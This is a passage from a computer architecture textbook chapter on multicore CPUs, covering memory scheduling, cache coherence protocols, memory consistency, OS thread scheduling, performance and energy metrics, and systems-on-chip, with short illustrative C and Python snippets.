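    unsigned bank;
    unsigned row;
};

/* FR-FCFS: among all queued requests, prefer row hits (requests whose
 * target row is already activated); among requests with the same hit
 * status, prefer the oldest. Returns NULL if the queue is empty. */
static struct mem_request *frfcfs_pick(struct mem_request *queue, size_t n)
{
    struct mem_request *best = NULL;
    bool best_is_hit = false;

    for (size_t i = 0; i < n; i++) {
        bool hit = (open_row[queue[i].bank] == (int)queue[i].row);
        if (best == NULL
            || (hit && !best_is_hit)
            || (hit == best_is_hit
                && queue[i].arrival_time < best->arrival_time)) {
            best = &queue[i];
            best_is_hit = hit;
        }
    }
    return best;
}
```

Note how the rule contains no notion of which thread issued each request, which is precisely why FR-FCFS can starve threads with poor row locality, as discussed above.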
Mitigating Interference
The combination of private caches and shared caches attempts to balance the impact
of interference with the need to provision resources for worst-case behavior: Private
caches allow each CPU core to manage a small working set of its data without first-
order impacts of interference, while the shared cache enables resource pooling to
reduce the frequency of long-latency misses to main memory for workloads with
large data footprints. However, it is still possible for memory interference, at the
caches and/or at main memory, to negatively impact one or more cores. This section
looks at three such examples, as well as potential mechanisms to mitigate them.
Our first example examines how cache requests from one core can impact the
management of a private cache belonging to a different core. If the shared LLC is
inclusive of upper-level private caches and one core evicts a cache block from the
LLC belonging to a second core, the second core will also have to evict that cache
block from its private caches even though the private cache space is not being used
by the first core. To address this (as well as pollution from hardware prefetchers),
some multicore CPUs employ a noninclusive or exclusive policy for the LLC or for
the last private cache level (Backes and Jiménez 2019). On a miss to main memory,
the noninclusive policy acts like the inclusive policy, where a copy of the data is
placed in the LLC and in the private cache(s). When a cache block eviction takes
place at the LLC, the noninclusive policy acts like the exclusive policy, where the
eviction does not trigger an eviction in the upper-level private caches.
Our second example examines how shared cache utilization by one core can
impact the available shared cache capacity, and thus the performance, for a different
core. In a conventional multicore CPU, shared resources are left unmanaged, i.e.,
there is no active mechanism to enforce that each core receives a fair portion of the
resources. This unmanaged approach is often useful to allow the easy distribution
of these resources across cores based on the heterogeneous needs of the threads
that each core is executing (e.g., in a two-core CPU, one core runs a thread that
has a large working set and uses up most of the LLC, while the other core runs a
thread that has a small working set and can make do with whatever capacity the first
thread does not use). However, when the heterogeneous needs are extremely
unbalanced, one or more of the threads may incur significant slowdowns. In our
example, if one greedy thread is using most of the LLC, cache blocks belonging
to other threads may constantly be evicted, hurting those threads’ performance
significantly. To address this, several works have proposed cache partitioning, where
some or all of the ways and/or sets of a cache are assigned to a specific core or
thread. Strict cache partitioning could ensure that the cache blocks from the other
threads in our example do not get evicted, as the greedy thread would not be allowed
to use partitions belonging to other threads. One commercial implementation of
cache partitioning is Intel’s Cache Allocation Technology (Herdrich et al. 2016).
Our third example examines how memory scheduling algorithms can introduce
unintentional slowdown for threads. Recall from “Main Memory Policies” that the
commonly used FR-FCFS scheduling algorithm does not account for any sort of
thread or application awareness and solely focuses on reducing the number of
row activations and precharge operations. While reducing activate and precharge
operations helps decrease the AMAT for a thread that can exploit row locality, it
can unfairly slow down the other threads in a multicore CPU, by continuing to
prioritize requests from the thread whose row is already activated. In this example,
one thread is generating many loads and stores to the same DRAM row, which is
currently activated, while the other threads each have a single load that is waiting
to access a different row in the same bank. FR-FCFS will look at all of the queued
requests and prioritize the requests from the first thread because their target row
is already activated. This causes all of the requests from the other threads to wait
longer in the queue and in extreme cases can lead to unintentional starvation for
these threads. To address this, researchers have proposed a number of memory
schedulers that explicitly augment the memory request metadata with a thread ID
and incorporate information about the thread into the scheduling algorithms. As
one example, the memory controller can use lightweight runtime metrics to predict
which threads are being slowed down due to memory interference and can prioritize
requests from these threads before prioritizing row locality (Mutlu and Moscibroda
2006).
Cache Coherence
When a core writes data, a write-back cache stores the update locally and defers propagating it; write-through caches, a common alternative, store the update in the cache and send every update to the
next lower level. However, write-through caches are not commonly employed in
multicore CPUs due to the impact of the increased write traffic on interference.
The Need for Coherency with Write-Back Caches In a single-core CPU, write-
back caches ensure that the CPU core sees the most recent version of the data for
each cache block, as the core always starts memory lookups from the top cache level
in the memory hierarchy. However, with multicore CPUs, a dirty cache block stored
in one core’s private cache is not immediately visible to other cores in the CPU.
This is because if the same cache lookup procedure for single-core CPUs is used, a
multicore CPU’s core would access its own private caches and the shared last-level
cache and not the private caches of other cores. If left unmodified, this can lead to
correctness issues, as one core may ignore and potentially incorrectly overwrite the
updates from another core.
With false sharing, a single cache block ends up being shared by both cores, even though their accesses are to different pieces of data. In
the case where both cores are trying to write to these pieces of data simultaneously,
the cache block will ping-pong (i.e., move back and forth) between the two cores,
with one core invoking an invalidation for the other core any time it wants to write
and vice versa. False sharing can be avoided only by ensuring that the two pieces
of data are mapped to different cache blocks (e.g., by having the programmer pad
data structure sizes to use up exact multiples of the cache block size). Second, if a
cache block is not currently held by a core in its private caches, the cache block is
assumed to be in a coherence state designated as invalid for that core (i.e., the core
cannot currently read from or write to that cache block).
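The padding remedy mentioned above is straightforward to express in code. The sketch below (in C11) assumes 64-byte cache blocks; the _Alignas qualifier guarantees that each counter starts its own block, so two cores incrementing their own counters no longer ping-pong a shared block between their caches.

```c
#include <stdint.h>

#define CACHE_BLOCK_SIZE 64  /* assumed cache block size in bytes */

/* BAD: both counters fall in the same cache block, so two cores
 * incrementing them will ping-pong the block between their caches
 * even though the counters are logically independent. */
struct counters_false_sharing {
    uint64_t core0_count;
    uint64_t core1_count;
};

/* BETTER: align and pad each counter to a full cache block so that
 * each core's writes stay in a block the other core never touches. */
struct padded_counter {
    _Alignas(CACHE_BLOCK_SIZE) uint64_t count;
    char pad[CACHE_BLOCK_SIZE - sizeof(uint64_t)];
};

struct counters_padded {
    struct padded_counter core0;  /* occupies its own cache block */
    struct padded_counter core1;
};
```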
In snoopy cache coherence (Goodman 1983), cores share a bus, and each core
maintains its own coherence state metadata. Each core reads all cache coherence
messages transmitted on the bus (i.e., it is snooping on all messages) to see if it
needs to react to the message (e.g., if it needs to write back any dirty changes to a
cache block and if it needs to invalidate the block). For example, if a core wants to
write to cache block x, it broadcasts a coherence message on the bus declaring its
intent to acquire write permissions. As only one core can have write permissions,
every other core on the bus will see the coherence message, and if a core has a copy
of cache block x, it will invalidate the block in all of its private caches. The other
cores require some form of acknowledgment mechanism to notify the requesting
core that they have completed any necessary actions or to supply an up-to-date version of
the data. Snoopy cache coherence is the simpler of the two approaches to implement
and works effectively when the CPU has a relatively low number of CPU cores, but
the broadcast-based bus scales poorly as the core count increases, both due to the
increased bus latency/energy and increased contention due to message serialization
on the bus.
Directory-based cache coherence (Censier and Feautrier 1978) avoids the poor
scaling of broadcasting by instead storing the coherence state metadata in a
directory. When a core triggers a coherence message, the message first goes to
the directory, which stores the state of the cache block in all cores serviced by the
directory. One example implementation is to maintain a bitvector for each cache
block currently held by any of the cores, where bit i in the bitvector indicates
whether core i currently has a copy of the cache block. When the directory
receives a coherence message, it looks up the metadata for the requested block
and then dispatches follow-up messages to only those cores that currently hold
the cache block. While directory-based coherence is more complex to implement,
it scales better than snoopy coherence in multiple dimensions. First, as
mentioned above, coherence messages need to be transmitted to only the cores that
currently hold the data and can be implemented using more scalable interconnection
networks than a bus. Second, the directory can be partitioned into multiple slices,
with each slice responsible for a subset of memory addresses. Third, a CPU
can implement multiple levels of directories, creating a directory hierarchy that
further reduces coherence message traffic and metadata storage requirements. This
improved scalability makes directory-based coherence a good fit when there are a
large number of cores in the CPU.
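A minimal sketch of the bitvector organization described above, in C: one sharer bit per core plus an owner field, with invalidations sent only to current sharers rather than broadcast to all cores. The entry layout and the send_invalidate() callback are illustrative assumptions, not a description of any specific directory implementation.

```c
#include <stdbool.h>
#include <stdint.h>

#define MAX_CORES 64

/* Directory entry for one cache block: one sharer bit per core, plus
 * the identity of the core holding write permission (if any). */
struct dir_entry {
    uint64_t sharers;  /* bit i set = core i holds a copy        */
    int owner;         /* core with write permission, -1 if none */
};

/* On a write request from `req_core`, send invalidations to exactly
 * the cores whose sharer bit is set -- no broadcast needed. */
static void handle_write_request(struct dir_entry *e, int req_core,
                                 void (*send_invalidate)(int core))
{
    for (int i = 0; i < MAX_CORES; i++) {
        bool holds_copy = (e->sharers >> i) & 1;
        if (holds_copy && i != req_core)
            send_invalidate(i);
    }
    e->sharers = 1ull << req_core;  /* requester is now the only holder */
    e->owner = req_core;
}
```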
Fig. 12 MSI protocol: solid lines are upgrades and dotted lines are downgrades
When a cache block is in the shared state, multiple L1 caches can hold identical copies of the
cache block. Since none of the cores have permissions to write to the cache block,
this ensures that any core reading the cache block has the most recent version of the
data. When a thread running on one of the cores wants to write to the cache block, it
first sends a message to the other cores, informing them to downgrade to the invalid
state (i.e., to invalidate their copy of the cache block, if they have one). Once the core
receives acknowledgments of the invalidations, it upgrades its own copy of the cache
block to the modified state. (While not shown, practical cache coherence protocols
implement additional transient states, to indicate an in-progress upgrade/downgrade
while waiting for other cores to complete their requested state changes.) This now
ensures that only this core has a copy of the cache block and that the core can now
safely perform its write. If another core wants to read the now-modified cache block,
it will send out a read request, which will force the writing core to downgrade its
cache block from the modified state to the shared state and to make the updates
visible to the other cores.
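The stable-state transitions of Fig. 12 can be summarized as a small next-state function. The sketch below (in C) covers only the three stable MSI states; as noted above, practical protocols add transient states while acknowledgments for a transition are still outstanding, which this sketch omits.

```c
/* Per-block coherence state kept by each core's private cache. */
enum msi_state { MSI_INVALID, MSI_SHARED, MSI_MODIFIED };

/* Events seen by a cache controller, either from its own core or
 * observed on the interconnect from other cores. */
enum msi_event {
    OWN_READ,     /* this core loads the block          */
    OWN_WRITE,    /* this core stores to the block      */
    REMOTE_READ,  /* another core requests read access  */
    REMOTE_WRITE  /* another core requests write access */
};

/* Next-state function for the stable MSI states in Fig. 12. */
static enum msi_state msi_next(enum msi_state s, enum msi_event ev)
{
    switch (ev) {
    case OWN_READ:
        return (s == MSI_INVALID) ? MSI_SHARED : s;
    case OWN_WRITE:
        /* reached only after other cores acknowledge invalidation */
        return MSI_MODIFIED;
    case REMOTE_READ:
        /* a dirty copy must be written back before downgrading */
        return (s == MSI_MODIFIED) ? MSI_SHARED : s;
    case REMOTE_WRITE:
        return MSI_INVALID;
    }
    return s;
}
```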
One drawback of MSI is that even when only one core has a copy of the
cache block in the shared state, it must wait for acknowledgments from all of
the other cores before it can upgrade this cache block to the modified state.
This can potentially generate a large amount of unnecessary coherence traffic,
given the lack of other copies in the private caches. The MESI cache coherence
protocol (Papamarcos and Patel 1984) provides an optimization for this drawback,
by introducing a fourth state called exclusive, as shown in Fig. 13. If a core reads a
cache block into its private cache and no other private cache has a copy, the cache
block will have an exclusive state, indicating that the core can read from the block
and that no other private copy exists. If the core subsequently wants to perform a
write to the block, it can now silently upgrade the cache block (i.e., without sending
any coherence messages to other cores) to the modified state. To ensure correctness,
if a second core wants to read the cache block, the first core’s copy is downgraded
from exclusive to shared, indicating that there may be more than one core currently
holding a copy of the block.
Fig. 13 MESI protocol: solid lines are upgrades and dotted lines are downgrades. Transitions that
are unchanged from MSI are grayed out
Memory Consistency Models
At a high level, each memory consistency model defines which possible memory interleavings can
be observed by a core. Regardless of the consistency model, each core must maintain
an ordering of loads and stores that does not violate true (i.e., read after write)
register dependencies, and because caches are part of the shared-memory state,
cache coherence is implemented. This section examines three popular types of
consistency models.
Sequential consistency (SC) (Lamport 1979) ensures that every core sees the
same ordering (i.e., interleaving) of individual memory operations. This is the
equivalent of cores going one at a time when performing a load or store, and that
load or store is considered part of the shared-memory state so that all cores see the
effect (though not all cores need to see the effect immediately). SC is often thought
of as one of the most intuitive models, but given its need for a globally consistent
interleaving, it can require a high overhead for implementation and is rarely used
for modern multicore CPUs.
Relaxed memory consistency models allow for some differences in orderings
observed by each core. One example of a relaxed model is total store ordering
(TSO) (SPARC International Inc. 1991), which was first developed for the SPARC
ISA and is used widely (albeit with some modifications) by the x86 ISA. In TSO,
a CPU core can observe its own write before other cores can, resulting in a slightly
different interleaving observed by each core. A key goal of TSO is to retain store
buffers in multiprocessors. For an out-of-order core, a store buffer holds stores that
have been committed but have yet to be written to the caches. In SC, the store
buffer is not considered part of the shared-memory state, and memory speculation
techniques that read data from the store buffer can require costly mechanisms to
squash and replay out-of-order loads that violate the global interleaving. With TSO's
relaxation, there is no need for such costly mechanisms, and the store buffer is
considered part of the shared-memory state.
An example of an even more relaxed model is weak ordering (Dubois et al.
1986). Weak ordering allows most memory operations to be reordered but uses
programmer-invoked synchronization primitives to explicitly define reordering
boundaries. A popular synchronization primitive for weak ordering is a fence, which
is used to enforce orderings within a core (but does not explicitly synchronize across
cores, unlike a barrier). A fence has three guarantees: (1) All cores see the same
exact ordering of fence primitives, (2) all load and store instructions that come
before the fence in a thread must complete before the fence, and (3) no load or store
instruction that comes after the fence can complete until after the fence takes place.
What this means is that for the loads and stores in between two fences, any ordering
of them can possibly occur. The programmer can explicitly insert more fences into
a thread to enforce a stricter ordering. The Arm ISA is an example architecture that
makes use of weak ordering.
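On weakly ordered ISAs such as Arm, compilers implement language-level fences using the ISA's barrier instructions. The C11 sketch below shows the canonical producer/consumer use of fences described above: the release fence orders the payload store before the flag store, and the acquire fence orders the flag load before the payload load. The variable names are illustrative.

```c
#include <stdatomic.h>
#include <stdbool.h>

int payload;                /* ordinary (non-atomic) data           */
atomic_bool ready = false;  /* flag signaling that the data is valid */

/* Producer: without the fence, weak ordering would allow the store
 * to `ready` to become visible before the store to `payload`. */
void producer(void)
{
    payload = 42;
    atomic_thread_fence(memory_order_release);  /* order prior stores */
    atomic_store_explicit(&ready, true, memory_order_relaxed);
}

/* Consumer: the acquire fence ensures that once `ready` is observed
 * as true, the earlier store to `payload` is also visible. */
int consumer(void)
{
    while (!atomic_load_explicit(&ready, memory_order_relaxed))
        ;  /* spin until the producer signals */
    atomic_thread_fence(memory_order_acquire);
    return payload;  /* guaranteed to read 42 */
}
```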
Please refer to a detailed discussion (Nagarajan et al. 2020) for more information
about these and other memory consistency models.
for that thread (e.g., program counter, registers, predictor history) are initialized to
the starting state. The thread then executes until the end of the quantum, unless the
thread is preempted early (e.g., to execute an exception handler).
Assuming the typical conditions that no early preemption took place and that the
thread has not yet finished executing, at the end of the quantum, the OS invokes
the thread scheduler to select the thread for the next quantum. If the selected thread
is different from the currently running thread, the OS invokes a preemption of the
running thread, which is known as a context switch. During a context switch, the
OS copies the CPU state associated with the thread being preempted into memory
and loads in the CPU state for the thread being run next from memory. From the
perspective of the thread, the context switch gives the thread the illusion that it
never stopped executing. From the perspective of a user, a PC can often give them
the illusion that all of their threads are running concurrently on a single-core CPU,
by rapidly context switching between them, as the scheduling quantum is on the
order of milliseconds and is imperceptible to humans for the typical number of
concurrently running threads.
To extend thread scheduling for multicore CPUs, the individual cores are each
exposed to the OS. As an n-core CPU without multithreading has n hardware
contexts, the OS can schedule n threads for every quantum. (When a CPU supports
m-way multithreading, each way is typically exposed to the OS as its own hardware
context, meaning that an n-core CPU with m-way multithreading exposes n × m
hardware contexts.) Conventionally, OS schedulers treated hardware contexts as
identical to one another, but this introduces two challenges in modern multicore
CPUs.
First, while a context switch preserves and restores CPU state for a thread, this
state does not typically include the contents of the cache, because cache blocks are
meant to be quickly accessible copies of data that is available in other parts of the
system. However, it can be beneficial for a thread to be reassigned to a hardware
context that it was previously scheduled on, as the thread can take advantage of data
that it had previously cached. Conventional scheduling approaches would disregard
this and assign the thread to any available context. Processor affinity, sometimes
referred to as CPU pinning, overcomes this by allowing a user to assign a thread
for execution on only the user-specified hardware contexts (e.g., the user assigns
a thread to only one CPU core). The OS scheduler obeys the processor affinity
assignments, ensuring that the thread executes only on the selected contexts.
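On GNU/Linux, processor affinity can be requested through the pthread affinity interface, as in the sketch below; other operating systems expose analogous but different APIs, and the choice of hardware context 2 here is arbitrary.

```c
#define _GNU_SOURCE
#include <pthread.h>
#include <sched.h>
#include <stdio.h>

/* Pin the calling thread to a single hardware context. */
static int pin_self_to_context(int context_id)
{
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(context_id, &set);  /* allow only this hardware context */
    return pthread_setaffinity_np(pthread_self(), sizeof(set), &set);
}

int main(void)
{
    int err = pin_self_to_context(2);
    if (err != 0)
        fprintf(stderr, "pthread_setaffinity_np failed: %d\n", err);
    /* From here on, the OS scheduler runs this thread only on
     * hardware context 2, preserving its cached working set. */
    return 0;
}
```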
Second, as discussed further in “Heterogeneous CPU Cores,” modern multicore
CPUs no longer have homogeneous cores. As a result, the choice of hardware
context to assign to a thread can have a significant impact on its performance and
energy consumption (e.g., assigning a thread to a big core when it needs only a little
core). Early systems with two types of cores made the difference between cores
transparent to the OS: A single hardware context was associated with both a big core
and a little core, and the hardware would use the CPU frequency setting chosen by
the OS for the CPU (see Controlling CPU Core Frequency below) to decide whether
the thread should run on the big core or on the little core. Modern systems can have
more than two types of CPU cores and often expose all of the CPU cores directly to
the OS. To manage these cores efficiently, OSes now include heterogeneity-aware
schedulers, such as the Energy Aware Scheduling approach available in modern
versions of the Linux kernel (Linux Kernel Organization 2023b).
Parallelizing Programs On the application side, there are two ways to take advan-
tage of the parallelism and efficiency offered by multicore CPUs. The first method
is to rewrite programs as multithreaded applications. Instead of writing a program
as a fully sequential series of functions, a programmer can identify opportunities
to perform some parts of the application concurrently. The programmer can use
threading libraries to either (1) explicitly spawn these parallel parts into independent
threads or (2) demarcate regions of the program that inform an advanced library
to automatically generate threads. Note that threads do not have to be fully
independent and that programmers can use synchronization primitives to coordinate
execution across threads (e.g., locks to protect critical section execution, barriers
to synchronize task or sub-task completion), as well as shared memory or message
passing to exchange information between threads. While this chapter does not go
into multithreaded programming in detail, there are other works (Mattson et al.
2004; Farooqi et al. 2022) that provide in-depth coverage of parallel programming
techniques and frameworks.
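As a small illustration of the explicit-spawning approach, the following C program (using POSIX threads) partitions a dot product across four threads and joins them before reducing the partial sums. The array size and thread count are arbitrary, and N is assumed to be divisible by the thread count.

```c
#include <pthread.h>
#include <stdio.h>

#define NUM_THREADS 4
#define N 1000000  /* assumed divisible by NUM_THREADS */

static double a[N], b[N], dot_partial[NUM_THREADS];

/* Each thread computes a partial dot product over its own slice of
 * the arrays; no synchronization is needed until the final reduction. */
static void *worker(void *arg)
{
    long t = (long)arg;
    long lo = t * (N / NUM_THREADS), hi = lo + (N / NUM_THREADS);
    double sum = 0.0;
    for (long i = lo; i < hi; i++)
        sum += a[i] * b[i];
    dot_partial[t] = sum;
    return NULL;
}

int main(void)
{
    for (long i = 0; i < N; i++) { a[i] = 1.0; b[i] = 0.5; }

    pthread_t tid[NUM_THREADS];
    for (long t = 0; t < NUM_THREADS; t++)
        pthread_create(&tid[t], NULL, worker, (void *)t);

    double dot = 0.0;
    for (long t = 0; t < NUM_THREADS; t++) {
        pthread_join(tid[t], NULL);  /* wait for thread completion */
        dot += dot_partial[t];
    }
    printf("dot = %f\n", dot);  /* expect 500000.0 */
    return 0;
}
```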
The second method is multiprogrammed execution, which makes it possible to use all of the cores in a multicore CPU even
if all of the applications are single-threaded, by allowing the processes to execute
in parallel. Most operating systems enable users to launch multiple processes
concurrently, and when a process starts (initially with one thread), the OS adds the
process’ thread to the list of all active threads for the OS to schedule (see Scheduling
Threads above). If a process is multithreaded, it will spawn additional threads over
time, which the OS will also add to its list of active threads. The OS scheduler will
typically not distinguish between threads belonging to the same process and threads
from other processes and will schedule as many threads as there are hardware
contexts.
Evaluating Multicore CPUs
While conventional metrics such as speedup have been widely used in the architec-
ture community for decades, several challenges make them difficult to directly apply
to multicore CPU evaluations. This section provides a summary of key challenges
for performance measurement and then discusses popular metrics that overcome
these challenges. It also briefly discusses metrics related to power and energy, given
their emphasis throughout the lifetime of multicore CPUs.
Parallel Speedup For multithreaded applications, the parallel speedup S(N) on N cores is defined as:

$$S(N) = \frac{T_s}{T_p} \qquad (4)$$
where Tp is the total execution time of the parallel version of the program for
N cores, and Ts is the total execution time of the sequential version of the program
(and not the parallel version with one core). The equation uses the sequential
version of the program to ensure that parallel speedup captures the overheads of
synchronization. As a result, S(1) can often be less than 1. Note that unlike with
single-thread applications, the IPC (instructions per cycle) of a program should
not be used as a substitute for execution time, as IPC values can be skewed by
synchronization traffic and other nondeterministic behavior.
A related metric is parallel efficiency, E(N):
$$E(N) = \frac{T_s}{T_p \times N} \qquad (5)$$
For multiprogrammed workloads, the slowdown of an application compares its performance when running alone on the CPU to its performance when running alongside the other applications in the workload:

$$\text{slowdown} = \frac{IPC_{\text{alone}}}{IPC_{\text{shared}}} \qquad (6)$$
where i and j are the members of the set of all applications in the workload.
Informally, a fairness of 1 indicates that all applications are experiencing an equal
slowdown, while at the other extreme, a fairness of 0 indicates that at least one
application is experiencing starvation. Note that unfairness in this case is defined as
the inverse of fairness.
Aggregate performance metrics for multiprogrammed workloads incorporate
some notion of both overall system throughput and fairness, in an attempt to remove
the bias mentioned above that can arise from using absolute IPCs. A popular metric
is weighted speedup (WS) (Snavely and Tullsen 2000; Eyerman and Eeckhout
2008), which sums up the normalized speedups (i.e., the inverse of slowdown) of
each application i in the workload to represent system throughput:
$$WS = \sum_i \frac{IPC_{\text{shared},i}}{IPC_{\text{alone},i}} = \sum_i \frac{1}{\text{slowdown}_i} \qquad (8)$$
To compare a system before and after a design modification, the improvement is reported as the ratio of the two weighted speedups:

$$WS_{\text{improvement}} = \frac{WS_{\text{after modification}}}{WS_{\text{before modification}}} \qquad (9)$$
HM represents the average slowdown in a user response (i.e., the turnaround time
for an output produced by the application) for each application in the workload due
to interference (Eyerman and Eeckhout 2008). Like with WS, higher is better, and
to compare two systems and report an improvement, one should calculate the ratio
of H M values for the two systems.
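Putting Eqs. 6 and 8 together, the sketch below (in C) computes weighted speedup and a harmonic-mean metric for an illustrative three-application mix. Since the excerpt does not reproduce Eq. 10, the HM formula used here (the number of applications divided by the sum of their slowdowns) is an assumption based on the common definition of harmonic speedup.

```c
#include <stdio.h>

/* Per-application IPCs measured alone vs. in the shared workload
 * (illustrative numbers for a three-application mix). */
#define NAPPS 3
static const double ipc_alone[NAPPS]  = { 2.0, 1.5, 1.0 };
static const double ipc_shared[NAPPS] = { 1.0, 1.2, 0.5 };

int main(void)
{
    double ws = 0.0, slowdown_sum = 0.0;
    for (int i = 0; i < NAPPS; i++) {
        double slowdown = ipc_alone[i] / ipc_shared[i];  /* Eq. 6 */
        ws += 1.0 / slowdown;                            /* Eq. 8 */
        slowdown_sum += slowdown;
    }
    /* Assumed harmonic speedup: NAPPS over the sum of slowdowns. */
    double hm = NAPPS / slowdown_sum;
    printf("weighted speedup = %.3f, harmonic speedup = %.3f\n", ws, hm);
    return 0;
}
```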
Power and Energy While power and energy are related, they represent different
limiting factors experienced by modern computers. Power (P ) represents a rate
of work being completed and can be calculated as a function of current (I ) and
voltage (V ):
$$P = I \times V \qquad (11)$$
At a high level, power in a CPU can be broken down into a dynamic component (e.g.,
the power consumed due to the active switching of transistors to perform work,
short-circuit power consumed during gate switching when transistors temporarily
connect the high voltage rail to ground due to transistor timing variation) and a
static component (e.g., the leakage of power due to imperfections in the switching
behavior of a transistor). The section titled “Optimizing CPU Cores for Parallelism”
briefly discusses components that impact dynamic power. Note that in the past,
dynamic power was orders of magnitude larger than static power, so static power
was thought of as a trivial factor in total power consumption. Today, because
decades of Dennard Scaling translated to significant dynamic power reductions,
static power makes up a nontrivial fraction of total CPU power. Power consumption
has a direct correlation with thermal dissipation and is used as a proxy to quantify
the heat generated by the CPU. The areal power density, which divides the power by
the surface area of the CPU die, is used to determine how aggressive thermal cooling
solutions (e.g., heatsinks, liquid cooling, fans) need to be to remove dissipated
heat from the CPU and keep the die within safe thermal operating limits. While
areal power density is used at design time to provision heat dissipation capacity,
the CPU makes use of temperature readings from multiple sensors embedded at
various locations in both the CPU chip and the motherboard to dynamically control
heat dissipation management, including cooling intensity (e.g., fan speed) and CPU
power throttling.
While power consumption was the key concern during the early years of
multicore CPUs, energy emerged as a first-order concern during the 2010s. Energy
(E) is the total electrical cost of performing a given amount of work and can be
calculated as a function of power:
$$E = P \times t \qquad (12)$$
where t is the time required to complete the defined amount of work. Challenges
associated with two extreme ends of computing platforms have resulted in the
growing emphasis on energy consumption, in addition to power consumption.
First, portable computers such as laptops and smartphones are battery-constrained,
as their available uptime depends on the total energy capacity of the computer’s
battery and the amount of energy that the system (including the CPU) consumes for
running applications. Second, the large number of servers in data centers and cloud
computing environments can result in exorbitant financial and environmental costs
to provide enough energy to perform user services. In both cases, reducing the total
energy used for a given application can result in more availability at a lower overall
cost. A related metric of interest is energy efficiency, which summarizes the energy
used for a single operation (e.g., an instruction, a microkernel), though one downside
of energy efficiency is the difficulty of defining an operation in an equal way across
platforms (e.g., two CPUs with different ISAs may not have equivalent instructions).
Several modern multicore CPUs contain ISA-compatible cores of heterogeneous
size and capability (see “Heterogeneous CPU Cores”), and dynamic energy and/or
energy efficiency metrics based on the characteristics of a thread are used to select
which of the heterogeneous cores will execute the thread.
The Evolution of Multicore CPUs
In the years that have elapsed since the introduction of multicore CPUs, there
have been a number of innovations to the general microarchitecture described in
“Multicore CPU Hardware Design.” While some of these innovations have been
limited to specific manufacturers or models, others have become commonplace
across modern CPUs. This section highlights three of the most significant shifts in
multicore CPU design and leaves the exploration of other innovations as an exercise
for the reader. These three shifts are finding widespread acceptance in contemporary
multicore CPUs: (1) the integration of specialized components on-chip alongside the
general-purpose CPU cores into what are known as systems-on-chip (SoCs), (2) the
diversification of the constituent cores in a multicore CPU, and (3) the advent of
composable chiplets that can allow for the easy integration of many smaller silicon
dies in a single chip.
Systems-on-Chip
Just as the limits of areal power density and thermal dissipation were a key
motivator for the rise of multicore CPUs, a new pressure point that came to
prominence a few years later ushered in the next key change. The emergence of
the smartphone drove a need to reduce total energy consumption, given the limited
battery capacities that were available in a portable form factor. To maximize energy
efficiency, smartphones made use of systems-on-chip (SoCs). A system-on-chip
tightly integrates many different components, which conventionally would have
been implemented using multiple chips for desktop and server computers, into a
single chip. Early SoC examples date back to the mid-1970s, such as the Intel
5810 (Intel Corp. 1976) introduced in 1974, and were designed to minimize battery
consumption in then-new electronic wristwatches. Over time, platform-specific
SoCs became relatively commonplace in the embedded systems community. Early
smartphones such as the original Apple iPhone, from 2007, made use of Samsung
SoCs that contained a single Arm CPU core, a graphics processing unit (GPU), and
caches integrated onto a single chip (Mannion 2007).
As the functionality and ubiquity of smartphones expanded, their underlying
SoCs incorporated significantly more components, including more CPU cores. At
a high level, the goal of these additional components is to introduce specialization
for commonly performed operations, in order to significantly improve the efficiency
of these operations compared to executing them on a general-purpose CPU core.
Figure 14 shows several key components of the Apple A17 Pro SoC (Apple Inc.
2023), which started production in 2023 for use in the iPhone 15 Pro series of
smartphones. As the figure shows, the SoC contains six CPU cores (which are
heterogeneous; see “Heterogeneous CPU Cores”), a GPU, multiple fixed-function
accelerators (a neural engine for machine learning inference, an image signal
processor for photo processing, a video codec engine for video recording and
streaming, a display engine for screen image generation), I/O interfaces (including
a dedicated USB controller), a system-level cache (an LLC that is available to the
CPU, GPU, and all accelerators), and four LPDDR5X memory controllers.
The process of identifying which components to include in the SoC (beyond the
basic CPU and GPU) makes use of profiling tools. These tools can monitor the
performance (and often the energy) of an existing chip as one or more applications
execute. To do this, modern profiling tools make use of hardware performance
counters, which are registers built into the chip logic to track various events taking
place during execution. For SoC design, profiling can identify the applications
or application kernels that are bottlenecked by the existing chip, which become
candidates for acceleration using dedicated SoC components. Of these candidates,
a subset of them is chosen for dedicated acceleration based on a combination
of factors, including the frequency of application/kernel usage, the area required
for a fixed-function accelerator, available chip area, power and energy budgets,
and the availability of existing accelerator designs (including the availability of
third-party designs known as IP cores, where IP stands for intellectual property).
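As a rough sketch of how such profiling data might drive the choice, the snippet below applies Amdahl's law (Amdahl 1967) to hypothetical kernels and greedily picks accelerators within an area budget; every kernel name and number is invented, and real SoC planning weighs far more factors than this heuristic.

# Hypothetical profile: (kernel, fraction of runtime, accelerator speedup,
# accelerator area in mm^2). Every value here is invented.
candidates = [
    ("video_decode", 0.30, 20.0, 4.0),
    ("matrix_mult",  0.25, 50.0, 6.0),
    ("crypto",       0.05, 10.0, 1.0),
]
AREA_BUDGET_MM2 = 8.0

def overall_speedup(accelerated) -> float:
    """Amdahl's law: only the accelerated fractions of runtime get faster."""
    new_time = 1.0
    for _, frac, speedup, _ in accelerated:
        new_time -= frac - frac / speedup
    return 1.0 / new_time

# Greedy pick by time-saved-per-area until the area budget is exhausted.
chosen, used_area = [], 0.0
for c in sorted(candidates, key=lambda c: (c[1] - c[1] / c[2]) / c[3], reverse=True):
    if used_area + c[3] <= AREA_BUDGET_MM2:
        chosen.append(c)
        used_area += c[3]

print([c[0] for c in chosen], f"-> {overall_speedup(chosen):.2f}x overall")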
Note that even among state-of-the-art SoCs that target the same platform, the
exact components can vary. As one example, Qualcomm’s Snapdragon 8 Gen 3
SoC (Qualcomm Technologies 2024) for smartphones integrates a 5G cell modem,
Wi-Fi and Bluetooth transceivers, and security accelerators in the chip and makes
use of a different combination of heterogeneous cores than the A17 Pro.
Although heterogeneous CPU cores first became popular in mobile SoCs, they can now be seen
in a wide range of modern multicore CPUs. For example, Intel’s 12th generation of
Core CPUs introduced heterogeneous CPU cores (named P-cores and E-cores) for
desktop computers (Rotem et al. 2021).
Beyond the cores themselves, the success of SoCs has demonstrated the benefits
of maximizing energy efficiency through directed specialization. However, there
remains a tension between high degrees of specialization and non-recurring engi-
neering (NRE) costs, such as those involved with design, layout, and verification.
As a simple motivating example, let us revisit the tiled multicore design from
“Optimizing CPU Cores for Parallelism.” While tiling helps reduce NRE costs, the
tile is a fixed design: For one core, there is a fixed amount of L1 instruction and
data caches, L2 cache, and potentially LLC slice. If a manufacturer wants to adapt
this tile for a platform whose workloads do not exhibit significant locality, they may
want to significantly reduce the cache sizes, but doing so requires a new tile to be
designed and verified.

